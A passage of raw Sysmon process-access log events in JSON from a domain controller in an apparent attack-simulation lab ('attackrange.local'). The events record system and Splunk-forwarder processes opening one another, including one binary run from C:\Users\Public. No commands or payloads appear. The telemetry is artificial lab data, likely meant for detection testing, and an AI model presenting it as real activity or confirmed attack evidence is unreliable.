indows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6755,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6756,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.506\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036770900}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.506","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036770900}","TargetProcessId":"3864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6757,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.553\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.553","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6758,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.647\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036770900}\r\nSourceProcessId: 3864\r\nSourceThreadId: 932\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.647","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036770900}","SourceProcessId":"3864","SourceThreadId":"932","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6759,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6760,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6761,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6762,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
